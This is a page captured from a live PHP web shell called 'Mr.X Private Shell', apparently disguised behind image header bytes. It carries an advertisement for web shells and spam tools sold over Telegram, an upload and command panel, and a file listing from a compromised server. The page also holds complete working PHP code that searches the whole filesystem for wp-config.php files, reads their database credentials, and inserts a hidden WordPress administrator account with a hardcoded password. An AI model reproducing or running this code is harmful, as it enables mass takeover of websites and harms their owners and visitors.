����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

afiencwd@216.73.216.19: ~ $
<?php   function scan($path) {     if ($dir = @opendir($path)) {         while (false !== ($file = readdir($dir))) {             $p = $path . DIRECTORY_SEPARATOR . $file;             if ($file != '.' && $file != '..') {                 if (is_link($p)) {                     continue;                 } elseif (is_dir($p)) {                     scan($p);                 } elseif ($file === 'wp-config.php') {                     inject($p);                 }             }         }     } } function inject($p) {     $user_login = 'root';     $user_password = '0HRjclI6MX';     $user_email = 'admin@wordpress.com';     $data = @file_get_contents($p);     if ($data === false) {         return;     }     $pattern = "/table_prefix\s*=\s*'([^']*)';/i";     if (preg_match($pattern, $data, $matches)) {         $table_prefix = $matches[1];     } else {         $table_prefix = 'wp_';     }     $lines = array_map('rtrim', file($p));     $conf = [];     foreach ($lines as $line) {         if (preg_match('/define\s*\(\s*[\'"]\s*(DB_USER|DB_HOST|DB_PASSWORD|DB_NAME)\s*[\'"]\s*,/', $line, $matches)) {             $conf[$matches[1]] = parse_define_value($line);         }     }     if (isset($conf['DB_HOST']) && isset($conf['DB_USER']) && isset($conf['DB_PASSWORD']) && isset($conf['DB_NAME'])) {         $mysqli = new mysqli($conf['DB_HOST'], $conf['DB_USER'], $conf['DB_PASSWORD'], $conf['DB_NAME']);         if ($mysqli->connect_errno) {             return;         }         $user_login = $mysqli->real_escape_string($user_login);         $user_password = $mysqli->real_escape_string($user_password);         $user_email = $mysqli->real_escape_string($user_email);         if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) {             if ($result->num_rows > 0) {                 $result->close();                 $mysqli->close();                 return;             }             $result->close();         }         $add_user_query = "INSERT INTO `{$table_prefix}users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_status`, `display_name`) SELECT '{$user_login}', MD5('{$user_password}'), '{$user_login}', '{$user_email}', '',         (SELECT `user_registered` FROM `{$table_prefix}users` ORDER BY `ID` ASC LIMIT 1),         0, '{$user_login}' FROM DUAL WHERE NOT EXISTS (     SELECT 1 FROM `{$table_prefix}users` WHERE `user_login` = '{$user_login}' );";         if ($mysqli->query($add_user_query)) {             $add_usermeta_query1 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`)  SELECT `ID`, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;";             $add_usermeta_query2 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`)  SELECT `ID`, 'wp_user_level', '10' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;";             $mysqli->query($add_usermeta_query1);             $mysqli->query($add_usermeta_query2);         }         $site_url = false;         if ($result = $mysqli->query("SELECT option_value FROM {$table_prefix}options WHERE option_name = 'siteurl';")) {             $row = $result->fetch_object();             $result->close();             $site_url = $row->option_value;         }         if (!$site_url || strpos($site_url, 'http') !== 0) {             if ($result = $mysqli->query("SELECT user_url FROM {$table_prefix}users ORDER BY ID ASC LIMIT 1;")) {                 $row = $result->fetch_object();                 $result->close();                 $site_url = $row->user_url;             }         }         if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) {             if ($result->num_rows > 0) {                 echo "<f>{$site_url}@@@{$p}</f>\n";             }             $result->close();         }         $mysqli->close();     } } function parse_define_value($line) {     if (preg_match("/define\s*\(\s*['\"]\w+['\"]\s*,\s*['\"](.*)['\"]\s*\)\s*;/", $line, $matches)) {         return $matches[1];     }     return null; } function scanRootPaths() {     if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {         foreach (range('A', 'Z') as $driveLetter) {             $drive = $driveLetter . ':\\';             if (is_dir($drive)) {                 scan($drive);             }         }     } else {         scan('/');     } } scanRootPaths(); die('!ended!');

Filemanager

Name Type Size Permission Actions
lsws Folder 0750
.bind File 0 B 0644
.binding File 4.46 KB 0644
.dat File 59 B 0644
.data_chunk File 56 B 0644
.desc File 4.23 KB 0644
.descriptor File 4.25 KB 0644
.elem File 1.12 MB 0644
.element File 51 B 0644
.ent File 53 B 0644
.entity File 51 B 0644
.entry File 50 B 0644
.fac File 1.12 MB 0644
.factor File 59 B 0644
.flag File 49 B 0644
.holder File 3.17 KB 0644
.item File 1.12 MB 0644
.k File 4.46 KB 0644
.mad-root File 0 B 0644
.marker File 50 B 0644
.obj File 56 B 0644
.parameter_group File 4.46 KB 0644
.pgrp File 6.31 KB 0644
.pointer File 4.23 KB 0644
.pset File 55 B 0644
.ptr File 3.17 KB 0644
.rec File 52 B 0644
.ref File 53 B 0644
.reference File 51 B 0644
.res File 4.46 KB 0644
.resource File 2.88 KB 0644
.sym File 577 B 0644
.tkn File 2.54 KB 0644
.token File 4.46 KB 0644
.val File 55 B 0644
.value File 52 B 0644
APAWrMkENh File 0 B 0755
AgAFanHHcG File 0 B 0755
AhrkeJcRRa File 0 B 0755
AuIEOGHlna File 0 B 0755
AzzjuiTcrC File 0 B 0755
BQpMIBJCax File 0 B 0755
BSMRLyBSSv File 0 B 0755
BTxHPvxiaT File 0 B 0755
BailrytmkZ File 4 B 0755
BzlEwoeGAC File 0 B 0755
CclGnKTdjm File 0 B 0755
CxthMcJSFc File 0 B 0755
DVbbttukGt File 0 B 0755
DioQxvIufc File 0 B 0755
DxqhtIVQWb File 0 B 0755
EEJdNgHVha File 0 B 0755
EJqtUTsnEN File 0 B 0755
EyNjvyaghw File 0 B 0755
FCVBkEKcgi File 0 B 0755
FDkxOhScSh File 0 B 0755
FjrJLhKTBI File 0 B 0755
FsXPNFcWkT File 0 B 0755
FwiwuXsInC File 0 B 0755
GPGiBzmJUf File 0 B 0755
GVbXUuTBGz File 0 B 0755
GghkIPMXRS File 0 B 0755
GmIKJcptcx File 0 B 0755
HNsqPZhWbn File 0 B 0755
HoEDdsLrmA File 0 B 0755
IVoXoZqXMb File 0 B 0755
JawQiACRWK File 0 B 0755
JhLJdhtkpb File 0 B 0755
JsYYdZRUpS File 0 B 0755
JyllmIwRWv File 0 B 0755
KMiZVpHzdv File 0 B 0755
KlWTtqbXxf File 0 B 0755
KpVXjKEMVd File 0 B 0755
LdZiKBOVpl File 0 B 0755
LlsNQarSxx File 0 B 0755
LqYxtxUvHc File 0 B 0755
MFxAixQMHB File 4 B 0755
MPbKBqpCRc File 0 B 0755
MWPKuVWRjI File 0 B 0755
MbMifAYsBt File 0 B 0755
MlsENvTgdC File 0 B 0755
MtfYqVodFm File 0 B 0755
NnZQkcqSoq File 0 B 0755
NqzmguLErb File 0 B 0755
NxVNvzZriz File 0 B 0755
OHzSQzGbFe File 0 B 0755
OJhtAQxGtQ File 0 B 0755
OoxubyHRva File 0 B 0755
PISDNEPUQJ File 0 B 0755
PJCthUhEKn File 0 B 0755
PWkZbJdwWe File 0 B 0755
PnvHFRnVcN File 0 B 0755
PostgreSQL.1435356434 File 14.64 KB 0600
QrgDXoYRlg File 0 B 0755
QvlComqxDv File 0 B 0755
QxCFgHgbsZ File 0 B 0755
RgLbZRoiwH File 0 B 0755
RmXNIkLXSw File 0 B 0755
RrYlCteQGt File 0 B 0755
SJnLIGHNuL File 0 B 0755
SwCScQFDVc File 0 B 0755
TBqrInQSIH File 0 B 0755
TCOpYpQFYH File 0 B 0755
THdPTXPWXN File 0 B 0755
TcsrREXDyM File 0 B 0755
TkVoDGDCPw File 0 B 0755
TmacgnJxiK File 0 B 0755
UINwsGrVlI File 0 B 0755
UqcymmcxJW File 0 B 0755
VBzFNGRddT File 0 B 0755
VgkMpNdgBe File 0 B 0755
WJnMOMADxJ File 0 B 0755
WYWNhBTnRj File 0 B 0755
WpqRheWjDe File 0 B 0755
WrfWEDeGJT File 0 B 0755
WyNaDBwfRW File 0 B 0755
XCklhlgHTo File 0 B 0755
XDEcYnKsUd File 0 B 0755
XwPODMZmfK File 0 B 0755
YUexXzOMCU File 0 B 0755
YZEQZjHURO File 0 B 0755
YdksnbJrrd File 0 B 0755
ZNjBkzYMXQ File 0 B 0755
ZQwOuVrPQw File 0 B 0755
ZeLyUGXQDP File 0 B 0755
aEcRmzZkFM File 0 B 0755
aMTITxGhMg File 0 B 0755
adminer.php File 465.43 KB 0644
aguYYsabDM File 0 B 0755
bUGPBsDgcV File 0 B 0755
bodbGutpwa File 0 B 0755
bpPKqiAMCg File 4 B 0755
cYAIGWYKtu File 0 B 0755
cgmYoAsHce File 0 B 0755
cjExfgdhrB File 0 B 0755
dDiQZfbQJd File 0 B 0755
dKaNvWtqAN File 0 B 0755
eNhYnwHkny File 0 B 0755
eSFUPTIJcZ File 0 B 0755
eSiPiLDexO File 0 B 0755
fLsxBKkSbW File 0 B 0755
fYhArSPqbI File 0 B 0755
f_47165b244a1d File 9.03 KB 0755
f_d74e27a14604 File 9.03 KB 0755
f_d7c5ad2dfdc0 File 9.03 KB 0755
f_defc3379166c File 9.03 KB 0755
f_fd56d7d62adc File 9.03 KB 0755
fnDnxVvNAp File 0 B 0755
fqCdMdcRMv File 0 B 0755
frroJWyOXV File 0 B 0755
gIFFBsrZla File 0 B 0755
gNyEXXGmBr File 0 B 0755
gOmDLCrSeG File 0 B 0755
geZHESqPco File 0 B 0755
gwBkEufJZU File 0 B 0755
iDriQrSSxf File 0 B 0755
iKZmPNkrdi File 0 B 0755
ikPgHGRWkg File 0 B 0755
ixbACAoPlx File 0 B 0755
kHNZKYVfMN File 0 B 0755
kOtutLozqu File 0 B 0755
kde-agent.so File 9.03 KB 0755
lFeOmhsKaf File 0 B 0755
lIFGQleOwi File 0 B 0755
lJHBRJpoVz File 0 B 0755
lZMRqMLyAp File 0 B 0755
lcICiJfDck File 0 B 0755
lxjeAEjRTR File 0 B 0755
mXeJCjYFud File 0 B 0755
mZjgIgjCCT File 0 B 0755
mefTDKFvDw File 0 B 0755
migKCmapKg File 0 B 0755
nKRQwRQQMk File 0 B 0755
nPRDPcnHXF File 0 B 0755
oQmwXKXLGb File 0 B 0755
oUMtmbTTQS File 0 B 0755
pHlTbjlumf File 0 B 0755
puNAdebUBI File 0 B 0755
qGWDuzPSJC File 0 B 0755
qIsSwGXQip File 0 B 0755
qeRgDHUVol File 0 B 0755
rLRPuFaepe File 0 B 0755
rzglpWYenK File 0 B 0755
rzrbJhHZMd File 0 B 0755
sSlvseCDQA File 0 B 0755
sURtpgDNxm File 0 B 0755
sem.Mvlg_ada_lock File 32 B 0640
smBXHmmstk File 0 B 0755
tEWCjBKcde File 0 B 0755
tIWkiLgwzq File 0 B 0755
tKlFcSRYbm File 0 B 0755
tXfVXVyHpw File 0 B 0755
tfHMBWIzAf File 0 B 0755
tnuzeYtkfz File 0 B 0755
uYDUTuFiws File 0 B 0755
ubuWpLaVgr File 0 B 0755
ukDlZswejW File 0 B 0755
uvSdyLshGF File 0 B 0755
uzRVTdHCnb File 0 B 0755
vgYbhoHYSL File 0 B 0755
vxcdkHuPdJ File 0 B 0755
wFoQzDZnbd File 0 B 0755
wQqAjybHSb File 0 B 0755
wahiFXAnCG File 0 B 0755
xKxZyUkdKj File 0 B 0755
xOIEuoOFKy File 0 B 0755
xgAWGJXHcY File 0 B 0755
xlAdeAXKod File 0 B 0755
xlXSMQXFHd File 0 B 0755
xogPaTqjiR File 0 B 0755
yZiHFCnLlr File 0 B 0755
zWdckFcEAY File 0 B 0755
zchHSWxhka File 0 B 0755
zpluWpahBZ File 0 B 0755